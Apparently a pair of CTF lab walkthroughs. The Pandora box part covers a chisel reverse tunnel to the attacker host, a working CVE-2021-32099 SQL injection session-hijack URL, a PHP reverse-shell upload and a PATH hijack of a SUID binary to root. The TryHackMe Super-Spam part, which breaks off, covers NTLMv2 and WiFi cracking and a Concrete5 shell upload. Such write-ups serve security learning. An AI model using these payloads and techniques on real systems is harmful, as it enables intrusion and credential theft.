═╣ MySQL connection using root/toor ................... No                                                                                                   
═╣ MySQL connection using root/NOPASS ................. No 

══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Dec  3 12:57 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 Dec  3 12:57 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 35 Dec  3 12:56 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
lrwxrwxrwx 1 root root 31 Dec  3 12:53 /etc/apache2/sites-enabled/pandora.conf -> ../sites-available/pandora.conf
<VirtualHost localhost:80>
  ServerAdmin admin@panda.htb
  ServerName pandora.panda.htb
  DocumentRoot /var/www/pandora
  AssignUserID matt matt
  <Directory /var/www/pandora>
    AllowOverride All
  </Directory>
-rw-r--r-- 1 root root 72958 Jun 11  2021 /etc/php/7.4/apache2/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 72539 Oct  6  2020 /etc/php/7.4/cli/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
╔══════════╣ Searching tmux sessions
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions                                                                       
tmux 3.0a                                                                                                                                                    

/tmp/tmux-1001
╔══════════╣ Analyzing Backup Manager Files (limit 70)
-rw-r--r-- 1 root root 14844 Mar  4  2020 /usr/share/php/DB/storage.php                                                                                      

-rw-r--r-- 1 matt matt 2222 Jan  3  2020 /var/www/pandora/pandora_console/include/help/en/help_history_database.php
<i>Mysql Example: GRANT ALL PRIVILEGES ON pandora.* TO 'pandora'@'IP' IDENTIFIED BY 'password'</i>
-rw-r--r-- 1 matt matt 2666 Jan  3  2020 /var/www/pandora/pandora_console/include/help/es/help_history_database.php
<i>Mysql Example: GRANT ALL PRIVILEGES ON pandora.* TO 'pandora'@'IP' IDENTIFIED BY 'password'</i>
-rw-r--r-- 1 matt matt 3159 Jan  3  2020 /var/www/pandora/pandora_console/include/help/ja/help_history_database.php
<i>Mysql Example: GRANT ALL PRIVILEGES ON pandora.* TO 'pandora'@'IP' IDENTIFIED BY 'password'</i>

╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /usr/share/lintian/overrides/passwd

╔══════════╣ Searching docker files (limit 70)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation                                      
-rw-r--r-- 1 matt matt 1263 Jan  3  2020 /var/www/pandora/pandora_console/Dockerfile

╔══════════╣ Analyzing Bind Files (limit 70)
-rw-r--r-- 1 root root 832 Feb  2  2020 /usr/share/bash-completion/completions/bind                                                                          

═══════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════                                                      
                                         ╚═══════════════════╝                                                                                               
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid 
-rwsr-x--- 1 root matt 17K Dec  3 15:58 /usr/bin/pandora_backup (Unknown SUID binary)

╔══════════╣ Backup files (limited 100)
-rwxr-xr-x 1 root root 44071 Nov 21 00:08 /usr/bin/wsrep_sst_mariabackup

╔══════════╣ Searching *password* or *credential* files in home (limit 70)

/var/www/pandora/pandora_console/godmode/groups/credential_store.php
/var/www/pandora/pandora_console/include/functions_credential_store.php
/var/www/pandora/pandora_console/images/user_password.png

Also running LSE. Below are all the things different from the linpeas run

lse run

[!] sof080 Can we write to a gpg-agent socket?............................. yes!
---
/run/user/1001/gnupg/S.gpg-agent
/run/user/1001/gnupg/S.gpg-agent.ssh
/run/user/1001/gnupg/S.gpg-agent.extra
/run/user/1001/gnupg/S.gpg-agent.browser

===================================================================( CVEs )=====                                                                             
[!] cve-2021-4034 Checking for PwnKit vulnerability........................ yes!
---
Vulnerable!
---
[!] cve-2022-25636 Netfilter linux kernel vulnerability.................... yes!
---
5.4.0-91-generic
---

Further Steps

Tried messing around in /var/www/pandora which is the location of a website which hosted at pandora.panda.htb. Just in case added pandora.pandora.htb to /etc/hosts, which had no effect(more on this later). The web dir has matt permissions. So cannot make any changes.

It looks to be an install of Pandora FMS . So if we can get it to spawn a shell, we can a matt user shell.

And then I noticed this.

daniel@pandora:/etc/apache2/sites-available$ cat pandora.conf 
<VirtualHost localhost:80>
  ServerAdmin admin@panda.htb
  ServerName pandora.panda.htb
  DocumentRoot /var/www/pandora
  AssignUserID matt matt
  <Directory /var/www/pandora>
    AllowOverride All
  </Directory>
  ErrorLog /var/log/apache2/error.log
  CustomLog /var/log/apache2/access.log combined
</VirtualHost>

Note the localhost on the first line. This website is only available locally.

daniel@pandora:/etc/apache2/sites-available$ curl -v http://localhost
*   Trying ::1:80...
* TCP_NODELAY set
* Connected to localhost (::1) port 80 (#0)
> GET / HTTP/1.1
> Host: localhost
> User-Agent: curl/7.68.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Thu, 19 May 2022 18:54:29 GMT
< Server: Apache/2.4.41 (Ubuntu)
< Last-Modified: Fri, 11 Jun 2021 14:55:39 GMT
< ETag: "3f-5c47eb370f0c0"
< Accept-Ranges: bytes
< Content-Length: 63
< Content-Type: text/html
< 
<meta HTTP-EQUIV="REFRESH" content="0; url=/pandora_console/">

This is the content of /var/www/pandora/index.html.

Reverse Port Forwarding to access internal website.

Let's use chisel to create a relay between the two machines. And access it from our local machine, which will make running exploit vulns on the website easier.

NOTE: We can use SSH port forwarding, or use the socat binary present on the machine for this as well(check linpeas useful software list).

daniel@pandora:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:   Ubuntu 20.04.3 LTS
Release:       20.04
Codename:      focal
daniel@pandora:~$ uname -a
Linux pandora 5.4.0-91-generic \#102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Let's get the linux-amd64 executable from the chisel github releases , which we can use on both our machine and the remote one..

# On the remote machine
daniel@pandora:/tmp/exp$ ./chisel server --port 9000 --proxy http://localhost:80
2022/05/19 19:30:40 server: Fingerprint XKMkRmW0yrANxp6Q0gDbxfx20bBU+DZQMNeBAzdlACY=
2022/05/19 19:30:40 server: Reverse proxy enabled
2022/05/19 19:30:40 server: Listening on http://0.0.0.0:9000

Let's try a simple chisel proxy. It soon becomes clear this does not work. The page is all wonky because a lot of HTML on pandora fms index.html is coded this way

<link rel="stylesheet" href="http://localhost/pandora_console/include/styles/common.css" type="text/css" />
<link rel="stylesheet" href="http://localhost/pandora_console/include/styles/menu.css" type="text/css" />
<link rel="stylesheet" href="http://localhost/pandora_console/include/styles/tables.css" type="text/css" />

<script language="javascript" type="text/javascript" src="http://localhost/pandora_console/include/graphs/flot/jquery.flot.js"></script>
<script language="javascript" type="text/javascript" src="http://localhost/pandora_console/include/graphs/flot/jquery.flot.min.js"></script>
<script language="javascript" type="text/javascript" src="http://localhost/pandora_console/include/graphs/flot/jquery.flot.time.js"></script>

We will need to be able to address this website as http://localhost on our local machine.

To accomplish this, we will be using chisel's reverse port forwarding feature.

TO get this to work. the chisel "server" runs on our machine, aka attacker machine in reverse proxy mode. And the chisel "client" runs on the remote machine.

Used this as a guide => https://medium.com/geekculture/chisel-network-tunneling-on-steroids-a28e6273c683

# on local machine
└─$ ./chisel server -p 3477 --reverse -v
2022/05/19 16:33:34 server: Reverse tunnelling enabled
2022/05/19 16:33:34 server: Fingerprint 98Ub3tYzyTENqnEYjejWa46FQehJHQta2rsD2U0voEI=
2022/05/19 16:33:34 server: Listening on http://0.0.0.0:3477
2022/05/19 16:39:01 server: session#1: Handshaking with 10.10.11.136:54540...
2022/05/19 16:39:01 server: session#1: Verifying configuration
2022/05/19 16:39:01 server: session#1: tun: Created
2022/05/19 16:39:01 server: session#1: tun: proxy#R:80=>80: Listening
2022/05/19 16:39:01 server: session#1: tun: Bound proxies
2022/05/19 16:39:01 server: session#1: tun: SSH connected

# on remote machine
daniel@pandora:/tmp/exp$ ./chisel client 10.10.14.26:3477 R:80:127.0.0.1:80/tcp
2022/05/19 20:38:27 client: Connecting to ws://10.10.14.26:3477
2022/05/19 20:38:27 client: Connected (Latency 44.074267ms)

Chisel server on local machine starts in reverse proxy mode, listens in port 3477 for connections.

Chisel client on remote machine connects to our chisel server, with the following config

"R" denotes reverse port forward
Listen on port 80 on our client machine. Since this is a low number port, we can only do this on our machine(not the remote server)
Forward everything from localhost:80 to "127.0.0.1:80" on the remote machine, thereby granting access to the Pandora FMS website.

Once executed, we can go to http://localhost on our machine. And we can see the Pandora FMS login portal.

Pandora FMS Investigation

At the bottom of the page we see v7.0NG.742_FIX_PERL2020

Now if we could only get the uname/pwd directly from the web app.

daniel@pandora:/var/www/pandora/pandora_console/include$ ls -lh config.php
-rw------- 1 matt matt 413 Dec  3 14:06 config.php

Not accessible.

When we try the creds for daniel, we get ERROR: User only can use the API.

Anyway, let's try searching for exploits for this version

CVE-2020-5844 CVE record lists thecybergeek(one of the box creators) as discoverer of the vuln. Also lists the exact same version of Pandora FMS. Exploit script from their github https://github.com/TheCyberGeek/CVE-2020-5844. This is an authenticated RCE bug though.

After looking at the Pandora FMS Vuln List we see three interesting CVEs

CVE-2021-32098 as a vulnerability fixed in v743. Allows unauthenticated attackers to perform Phar deserialization.
CVE-2021-32099 as a vuln ficed in v743. Also unauthenticated.
CVE-2021-32100 "A remote file inclusion vulnerability exists in Artica Pandora FMS 742, exploitable by the lowest privileged user."

A great explanation on these vulns is here, by the folks who discovered it => https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained/

CVE-2021-32099 is A SQL injection vulnerability in the pandora_console component of Artica Pandora FMS 742 allows an unauthenticated attacker to upgrade his unprivileged session. Sounds exactly like what we need.

CVE-2021-32099 unauthenticated session upgrade using SQLi

We will use the link available here => https://github.com/ibnuuby/CVE-2021-32099, and remove port 8000 since we dont need it.

http://localhost/pandora_console/include/chart_generator.php?session_id=a%27%20UNION%20SELECT%20%27a%27,1,%27id_usuario%7Cs:5:%22admin%22;%27%20as%20data%20FROM%20tsessions_php%20WHERE%20%271%27=%271

Put this in the browser. Reload once and then go back to http://locahost and you will be logged in(because of the insertion of a session cookie taken straight from the DB).

Extra Info: URL-decode of the above URL to see the SQLi being used

http://localhost:8000/pandora_console/include/chart_generator.php?session_id=a' UNION SELECT 'a',1,'id_usuario|s:5:"admin";' as data FROM tsessions_php WHERE '1'='1

In the interface, under "Admin Tools" we see a file manager => http://localhost/pandora_console/index.php?sec=gextensions&sec2=godmode/setup/file_manager

Let's use this to upload a PHP webshell. On Kali, this is available at /usr/share/webshells/php/php-reverse-shell.php.

Create dir shell. Upload a file in it as shell.php. And then access it directly. For me it was http://localhost/pandora_console/images/shell/shell.php

And we GOT IT!

└─$ ncat -lnvp 443                
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.11.136.
Ncat: Connection from 10.10.11.136:37958.
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 22:27:10 up  6:13,  2 users,  load average: 0.01, 0.04, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
daniel   pts/0    10.10.14.26      16:23   37.00s  0.99s  0.99s -bash
daniel   pts/1    tmux(30407).%0   19:29    1:46m  0.88s  0.76s ./chisel client 10.10.14.26:3477 R:80:127.0.0.1:80/tcp
uid=1000(matt) gid=1000(matt) groups=1000(matt)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
matt@pandora:/$ export TERM=xterm-25color

Go get that user flag!

Adding SSH keys, so that we can login using a regular shell and not a clunky reverse shell.

└─$ ssh-keygen -f ./pandora-key -t ecdsa -b 521
Generating public/private ecdsa key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in ./pandora-key
Your public key has been saved in ./pandora-key.pub
...
...
└─$ ll
total 16
-rw------- 1 kali kali  724 May 19 18:42 pandora-key
-rw-r--r-- 1 kali kali  263 May 19 18:42 pandora-key.pub

Append the pandora-key.pub to ~/.ssh/authorized_keys in matt's home folder. And voila! we have ssh login as matt.

└─$ ssh -i pandora-key matt@pandora.htb
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
...
...
matt@pandora:~$ id
uid=1000(matt) gid=1000(matt) groups=1000(matt)

You can stop the chisel instances now :)

We can finally get the contents of /var/www/pandora/pandora_console/include/config.php.

<?php
// File generated by centos kickstart
$config["dbtype"] = "mysql";
$config["dbname"]="pandora";
$config["dbuser"]="pandora";
$config["dbpass"]="CENSORED";
$config["dbhost"]="localhost";
$config["homedir"]="/var/www/pandora/pandora_console";
$config["homeurl"]="/pandora_console";
error_reporting(0); 
$ownDir = dirname(__FILE__) . '/';
include ($ownDir . "config_process.php");
?>

matt@pandora:~$ mysql -u pandora -p pandora
Enter password:

MariaDB [pandora]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| pandora            |
+--------------------+
MariaDB [pandora]> show tables;
| tpassword_history                  | # Only Interesting table I found

MariaDB [pandora]> select * from tpassword_history;
+---------+---------+----------------------------------+---------------------+---------------------+
| id_pass | id_user | password                         | date_begin          | date_end            |
+---------+---------+----------------------------------+---------------------+---------------------+
|       1 | matt    | f655f807365b6dc602b31ab3d6d43acc | 2021-06-11 17:28:54 | 0000-00-00 00:00:00 |
|       2 | daniel  | 76323c174bd49ffbbdedf678f6cc89a6 | 2021-06-17 00:11:54 | 0000-00-00 00:00:00 |
+---------+---------+----------------------------------+---------------------+---------------------+
2 rows in set (0.001 sec)

Ran it through crackstation. Nothing useful.

Now, let's try to try to do something with that SUID binary /usr/bin/pandora_backup. Downloading to local system and decompiling with Ghidra gives us the following

bool main(void)

{
  __uid_t __euid;
  __uid_t __ruid;
  int iVar1;

  __euid = getuid();
  __ruid = geteuid();
  setreuid(__ruid,__euid);
  puts("PandoraFMS Backup Utility");
  puts("Now attempting to backup PandoraFMS client");
  iVar1 = system("tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*");
  if (iVar1 == 0) {
    puts("Backup successful!");
    puts("Terminating program!");
  }
  else {
    puts("Backup failed!\nCheck your permissions!");
  }
  return iVar1 != 0;
}

If we could write something in PATH, we can execute a fake tar to get us a root shell.

matt@pandora:~/bin$ which bash
/usr/bin/bash
matt@pandora:~/bin$ echo "/usr/bin/bash -p" > tar
matt@pandora:~/bin$ chmod 777 tar
matt@pandora:~/bin$ export PATH=$PWD:$PATH
matt@pandora:~/bin$ echo $PATH
/home/matt/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
matt@pandora:~/bin$ /usr/bin/pandora_backup 
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:~/bin# id
uid=0(root) gid=1000(matt) groups=1000(matt)

Go get that root flag!

TryHackMe Super-Spam Walkthrough

Krishna — Tue, 10 Aug 2021 13:32:18 +0000

https://tryhackme.com/room/superspamr

Defeat the evil Super-Spam, and save the day!!

1) Enumeration

# Nmap 7.91 scan initiated Sat Aug  7 19:25:30 2021 as: nmap -p- -A -Pn -oN resultsNmap -vv 10.10.110.84                                                                   
Nmap scan report for 10.10.110.84                                                                                                                                          
Host is up, received user-set (0.17s latency).                                                                                                                             
Scanned at 2021-08-07 19:25:31 IST for 360s                                                                                                                                
Not shown: 65530 closed ports                                                                                                                                              
Reason: 65530 resets                                                                                                                                                       
PORT     STATE SERVICE REASON         VERSION                                                                                                                              
80/tcp   open  http    syn-ack ttl 60 Apache httpd 2.4.29 ((Ubuntu))                                                                                                       
|_http-generator: concrete5 - 8.5.2                                                                                                                                        
| http-methods:                                                                                                                                                            
|_  Supported Methods: GET HEAD POST OPTIONS                                                                                                                               
|_http-server-header: Apache/2.4.29 (Ubuntu)                                                                                                                               
|_http-title: "Home :: Super-Spam                                                                                                                                           "
4012/tcp open  ssh     syn-ack ttl 60 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)                                                                         
| ssh-hostkey:                                                                                                                                                             
|   2048 86:60:04:c0:a5:36:46:67:f5:c7:24:0f:df:d0:03:14 (RSA)                                                                                                             
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCjPfdefRhbpiW/oi5uUVtVRW/pYZcnADODOU4e80iSnuqWfRB5DAXTpzKZNw5JBQGy+4Amwz0DyX/TlYBgXRxPXwFimpBXnc02jpMknSaDzdRnInU8wFcsBQc+GraYz1mMH
vRcco2FfIrKurDbyEsBCzwJuk/RKdSq2rcFLhq8QAPoxc9FQcNeUIZrBt53/7+fD7B7NvjjU22+hXZhjt6PLC3LDWcaMvpYCxMYGwKoC9xTs+FtzEFrt6yWzKrXV1iNuKdNyt8vu22bcPl2GrQ9ai9I89DEY4wB3dADP6AfNikb
i0QWjdNbW2fhblG9PvKRu9s3IbpVueX2qBfInuAF                                                                                                                                   
|   256 ce:d2:f6:ab:69:7f:aa:31:f5:49:70:e5:8f:62:b0:b7 (ECDSA)                                                                                                            
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIs/ZpOvCaKtCEwW4YraPciYLZnrRXDR6voHu0PipWaQpcdnsc8Vg1WMpkX0xgjXc9eD3NuZmBtTcIDTJXi7v4U=         
|   256 73:a0:a1:97:c4:33:fb:f4:4a:5c:77:f6:ac:95:76:ac (ED25519)                                                                                                          
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHHX1bbkvh6bRHE0hWipYWoYyh+Q+uy3E0yCBOoyY888                                                                                         
4019/tcp open  ftp     syn-ack ttl 60 vsftpd 3.0.3                                                                                                                         
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x    2 ftp      ftp          4096 Feb 20 14:42 IDS_logs
|_-rw-r--r--    1 ftp      ftp           526 Feb 20 13:53 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.17.9.26
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text 
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable 
|_End of status
5901/tcp open  vnc     syn-ack ttl 60 VNC (protocol 3.8)
| vnc-info: 
|   Protocol version: 3.8
|   Security types: 
|     VNC Authentication (2)
|     Tight (16)
|   Tight auth subtypes: 
|_    STDV VNCAUTH_ (2)
6001/tcp open  X11     syn-ack ttl 60 (access denied)

Observations from nmap scan.

Port 80 - Apache 2.4.29 - Webserver

Running a website that makes use of Concrete5 CMS 8.5.2 ( looking at page source, and also using Wappalyzer )

Possible XSS Exploit - Concrete5 8.5.4 - 'name' Stored XSS, https://raw.githubusercontent.com/Quadron-Research-Lab/CVE/main/CVE-2021-3111.pdf

Another possible RCE Exploit -> https://hackerone.com/reports/768322, https://github.com/concrete5/concrete5/issues/8319
Port 4012 - SSH - OpenSSH 7.6p1

Port 4019 - FTP - vsftpd 3.0.3

Anonymous login allowed. Let's take a look inside.

ftp> ls -la
227 Entering Passive Mode (10,10,140,162,190,141).
150 Here comes the directory listing.
drwxr-xr-x    4 ftp      ftp          4096 May 30 19:26 .
drwxr-xr-x    4 ftp      ftp          4096 May 30 19:26 ..
drwxr-xr-x    2 ftp      ftp          4096 May 30 19:26 .cap
drwxr-xr-x    2 ftp      ftp          4096 Feb 20 14:42 IDS_logs
-rw-r--r--    1 ftp      ftp           526 Feb 20 13:53 note.txt

ftp> ls                                                                                           227 Entering Passive Mode (10,10,140,162,182,217).                                               150 Here comes the directory listing.                                                             -rwxr--r--    1 ftp      ftp        370488 Feb 20 14:46 SamsNetwork.cap                           226 Directory send OK.                                                                           ftp> ls -la                                                                                       227 Entering Passive Mode (10,10,140,162,193,19).                                                 150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 May 30 19:26 .                            
drwxr-xr-x    4 ftp      ftp          4096 May 30 19:26 ..                           
-rw-r--r--    1 ftp      ftp           249 Feb 20 13:36 .quicknote.txt               
-rwxr--r--    1 ftp      ftp        370488 Feb 20 14:46 SamsNetwork.cap

VERY IMPORTANT - Usually we don't look for hidden files in FTP servers, which in this case would have caused me to miss the .cap directory. I'll admit I did not see them in my first attempt at the machine. Came back to the machine, and execute ls -a in an act of desperation, which thankfuly turned out to be true.

Contents of note.txt

┌──(kali㉿kali)-[~/Documents/thm_superspam]
└─$ cat note.txt        
12th January: Note to self. Our IDS seems to be experiencing high volumes of unusual activity.
We need to contact our security consultants as soon as possible. I fear something bad is going
to happen. -adam

13th January: We've included the wireshark files to log all of the unusual activity. It keeps
occuring during midnight. I am not sure why.. This is very odd... -adam

15th January: I could swear I created a new blog just yesterday. For some reason it is gone... -adam

24th January: Of course it is... - super-spam :)

It seems we have to look into the .pcap files aka network capture files to get more info. Apparently whatever unusual stuff happened, it happened around midnight.

The hacker probably compromised the CMS and deleted the blog post left by this adam (possible username to keep in mind). And looks like the hacker is such a show-off that they left a message in note.txt.

After going into the IDS_logs folder, we see so many files. Most of the files in this dir are zero-byte files. But there were four .pcap files that I downloaded, which were the only ones that had any bytes in them.

Now, to the contents of the .cap directory.
Contents of .quicknote.txt

└─$ cat .quicknote.txt                           
 It worked... My evil plan is going smoothly.
 I will place this .cap file here as a souvenir to remind me of how I got in...
 Soon! Very soon!
 My Evil plan of a linux-free galaxy will be complete.
 Long live Windows, the superior operating system!

The other file in this directory is SamsNetwork.cap. So according to super-spam, this capture file contains the means for us to "get in", whatever that means.

2) Foothold

PHP File Upload Attempt

For this, my first attempt was to get a reverse shell using a PHP file upload.

While going through the blog, I noticed that the blog posts allowed comments to be made, along with attachments.

Although image attachments were allowed in the comments, PHP attachments were not. This was due to a client-side filter(jQuery file upload handling code).

This filter can easily be avoided by modifying the page response using a proxy(Burp Intercept/ZAP Breakpoint).

But even after this, there seemed to be server-side filters preventing a file upload.

Cracking NTLM hashes found in "IDS_logs" packet captures

Now, let's take a step back and take a look at the packet captures. From note.txt earlier, the "unusual" activity was close to midnight.

The 12th April 2021 pcap involves activity that occurs around 1 AM. Its mostly the SAMR protocol(https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/4df07fab-1bbc-452f-8e92-7853a3c7e380).

The pcap files for 13th and 16th are regarding HTTP requests to a Chinese domain, which we will ignore for now.

The pcap file for the 14th April 2021 is interesting, since it contains SMBv2 protocol captures that include NTLM authentication attempts. Let's see if we can get some useful data from this.

Note: Ultimately these credentials turned out to be useless, but it was a nice rabbit hole to follow :D You can skip the NTLM hash cracking section and scroll down to the next one

Took the help of this article to crack the NTLM hash, because I'm a noob at this => https://research.801labs.org/cracking-an-ntlmv2-hash/

Domain Name: 3B
User Name: lgreen
Host name: 02694W-WIN10

NTProofStr: 73aeb418ae0e8a9ec167c4d0880cfe22
NTLMv2 Response:
    010100000000000049143c43a261d6012ce41adf31a1363c00000000020004003300420001001e003000310035003600360053002d00570049004e00310036002d004900520004001e0074006800720065006500620065006500730063006f002e0063006f006d0003003e003000310035003600360073002d00770069006e00310036002d00690072002e0074006800720065006500620065006500730063006f002e0063006f006d0005001e0074006800720065006500620065006500730063006f002e0063006f006d000700080049143c43a261d60106000400020000000800300030000000000000000100000000200000fc849ef6b042cb4e368a3cbbd2362b5ccc39324c75df3415b6166d7489ad1d2b0a001000000000000000000000000000000000000900220063006900660073002f003100370032002e00310036002e00360036002e0033003600000000000000000000000000

NTLM Server Challenge: a2cce5d65c5fc02f

According to the article, final crackme format is

username::domain:ServerChallenge:NTProofstring:modifiedntlmv2response

which in our case would be

lgreen::3B:a2cce5d65c5fc02f:73aeb418ae0e8a9ec167c4d0880cfe22:010100000000000049143c43a261d6012ce41adf31a1363c00000000020004003300420001001e003000310035003600360053002d00570049004e00310036002d004900520004001e0074006800720065006500620065006500730063006f002e0063006f006d0003003e003000310035003600360073002d00770069006e00310036002d00690072002e0074006800720065006500620065006500730063006f002e0063006f006d0005001e0074006800720065006500620065006500730063006f002e0063006f006d000700080049143c43a261d60106000400020000000800300030000000000000000100000000200000fc849ef6b042cb4e368a3cbbd2362b5ccc39324c75df3415b6166d7489ad1d2b0a001000000000000000000000000000000000000900220063006900660073002f003100370032002e00310036002e00360036002e0033003600000000000000000000000000

Saving above to a file called crackme.txt and running hashcat on my host machine, with rockyou.txt as a password list.

❯ hashcat -m 5600 crackme.txt rockyou.txt 
    hashcat (v6.1.1) starting...

LGREEN::3B:a2cce5d65c5fc02f:73aeb418ae0e8a9ec167c4d0880cfe22:010100000000000049143c43a261d6012ce41adf31a1363c00000000020004003300420001001e003000310035003600360053002d00570049004e00310036002d004900520004001e0074006800720065006500620065006500730063006f002e0063006f006d0003003e003000310035003600360073002d00770069006e00310036002d00690072002e0074006800720065006500620065006500730063006f002e0063006f006d0005001e0074006800720065006500620065006500730063006f002e0063006f006d000700080049143c43a261d60106000400020000000800300030000000000000000100000000200000fc849ef6b042cb4e368a3cbbd2362b5ccc39324c75df3415b6166d7489ad1d2b0a001000000000000000000000000000000000000900220063006900660073002f003100370032002e00310036002e00360036002e0033003600000000000000000000000000:CENSORED

SUCCESS!! Our password is CENSORED, for the user lgreen

Trying this password for the VNC service at port 5901. Nope not working.
Let's try the lgreen:CENSORED combo for the SSH Service at port 4012. Nope not working.
Maybe trying at the login portal in Concrete5 CMS will work? Tried. Nope not working. Tried with admin and root usernames as well. In case you are wondering where the "Login" portal can be found.

Ok, time to move on

Cracking WiFi password from SamNetwork.cap file

Since we have gathered as much as possible(I think) from the IDS logs, let's see what we can infer from the SamsNetwork.cap packet capture, which apparently is how super-spam "got in".

Looks like a Network capture from a WiFi network. Looks like we'll have to use aircrack-ng to guess the password for the network. Let's use rockyou.txt as our wordlist.

Disclaimer: Not an expert on Wifi cracking :D Just used this command after reading some articles on how to crack Wifi passwords.

aircrack-ng -w /usr/share/wordlists/rockyou.txt SamsNetwork.cap

Password found is CENSORED. Let's try this in the login portal for the Blog. But what usernames do we use? Good question. Let's simply try using the usernames that are available in the blog posts themselves.

Go to https://10.10.142.204/concrete5/index.php/blog
Click on each of the Individual blog posts and extract the usernames found. We get a total of four users.

The usernames we find are:

adam_admin
benjamin_blogger
lucy_loser
donald_dump

Let's try the password we just found for all of these usernames in the Blog Login portal.

Success! The password works for the user donald_dump.

Uploading a PHP Reverse Shell.

When you log in, you will see what looks like a debugging stack trace. But the URL will be set to http://IP/concrete5/index.php/dashboard/welcome.

Just change the URL to "http://IP/concrete5/index.php", and we will be at the home page in "dashboard" mode for the CMS.

Now that we logged in to the CMS, let's try to upload a PHP reverse shell to get a foothold in the machine. Click on Settings(top-right corner button), go to File Manager. Here there is an "Upload Files" button. Let's try that.

We get an Invalid File Extension(hover cursor over the uploaded file box).

At this point, we must remember that we found an RCE exploit for Concrete5 CMS 8.5.2(scroll up to the beginning of the Foothold section).

According to the HackerOne report, we need to go to Settings -> "System & Settings" -> Allowed File Types(under Files), and add PHP. Apparently, this will allow us to configure the File Manager to allow PHP file uploads. The report also says we need an "Admin" role. Looking at the Donald_Dump user in Dashboard -> Members -> Donald_Dump we see

With that taken care of, let's try to add PHP to the list of allowed extensions.

And now let's go back to File Manager and see if we can upload our reverse shell file.

It works! Note down the "URL to File". Since the CMS seems to be using random number folder names to store uploaded files, we will need the exact path to access this, to get our reverse shell.

The URL was like this for me => http://10.10.140.162/concrete5/application/files/7516/2852/3656/revshell.php

BTW this is the Pentest Monkey PHP Reverse Shell file.

Start netcat listener, and then visit to the Reverse Shell URL in the browser.

And we have shell! Foothold secured!

Looking for user.txt

Let's navigate around to look for the user flag in the home directory

www-data@super-spam:/home$ ls -lR
.:
total 20
drwxr-xr-x 2 benjamin_blogger benjamin_blogger 4096 Apr  9 15:22 benjamin_blogger
drw-rw---- 6 donalddump       donalddump       4096 Apr  9 15:23 donalddump
drwxr-xr-x 7 lucy_loser       lucy_loser       4096 Apr  9 15:23 lucy_loser
drwxr-xr-x 5 root             root             4096 May 30 20:08 personal
drwxr-xr-x 4 super-spam       super-spam       4096 Apr  9 15:24 super-spam

./benjamin_blogger:
total 0
ls: cannot open directory './donalddump': Permission denied

./lucy_loser:
total 12
-rw-r--r-- 1 root root   28 Feb 24 17:27 calcs.txt
drwxr-xr-x 2 root root 4096 Feb 24 17:27 prices
drwxr-xr-x 2 root root 4096 Feb 24 17:27 work

./lucy_loser/prices:
total 0

./lucy_loser/work:
total 0

./personal:
total 12
drwxr-xr-x 2 root root 4096 May 30 20:07 Dates
drwxr-xr-x 2 root root 4096 May 30 20:07 Work
drwxr-xr-x 2 root root 4096 May 30 20:08 Workload

./personal/Dates:
total 0

./personal/Work:
total 4
-rw-r--r-- 1 root root 47 May 30 19:56 flag.txt

./personal/Workload:
total 4
-rw-r--r-- 1 root root 215 Feb 20 17:04 nextEvilPlan.txt

./super-spam:
total 4
-rw-r--r-- 1 root root 251 Feb 24 17:25 flagOfWindows

And we have found our flag.txt in /home/personal/Work/flag.txt

Also, the names of all the users who have folders in the /home/ folder

benjamin_blogger
donalddump
lucy_loser
super-spam

Let's have a look at the other folders and see if we can get something useful.

Found something in lucy_loser's directory

